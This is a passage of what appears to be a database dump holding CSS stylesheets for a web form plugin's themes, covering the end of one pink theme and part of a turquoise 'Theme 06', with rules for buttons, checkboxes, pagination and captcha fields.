relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #D7639F;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E47DB3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #D863A0 ;\r\n	background: -moz-linear-gradient(left, #D7639F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D863A0 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F173B4 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D7639F ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D863A0 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F173B4 ));\r\n	background: -webkit-linear-gradient(left, #D7639F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D863A0 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F173B4 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -o-linear-gradient(left, #D7639F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D863A0 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F173B4 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -ms-linear-gradient(left, #D7639F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D863A0 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F173B4 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nbackground: linear-gradient(to right, #D7639F 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #D863A0 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #F173B4 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #D6CAD2;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(20,'Theme 06 turquoise','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B1EBE9;\r\nborder: 1px solid #018580;\r\nmargin-bottom: 10px;\r\ncolor: #018580;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235};\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #019993;\r\n 	padding: 0px 36px 0 20px ;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #018580;\r\n\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #00C5BD;\r\n}\r\n.previous-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: \" \";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #019993;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #018580;\r\n}\r\n.button-submit:hover {\r\n	background: #00C5BD;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #B1EBE9;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #029A95;\r\n	color: #ffffff !important;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2 p{\r\n	color: #ffffff !important;\r\n	\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\nfont-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #029A95;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235} !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #029A95;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00DAD3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #01B3AD ;\r\n	background: -moz-linear-gradient(left, #01B3AD 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01CDC6 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #02DED6 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01B3AD ), color-stop(39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01CDC6 ), color-stop(100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #02DED6 ));\r\n	background: -webkit-linear-gradient(left, #01B3AD 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01CDC6 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #02DED6 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -o-linear-gradient(left, #01B3AD 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01CDC6 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #02DED6 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\n	background: -ms-linear-gradient(left, #01B3AD 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01CDC6 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #02DED6 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235});\r\nlinear-gradient(to right, #01B3AD 0{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #01CDC6 39{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}, #02DED6 100{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235})\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #029A95;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: 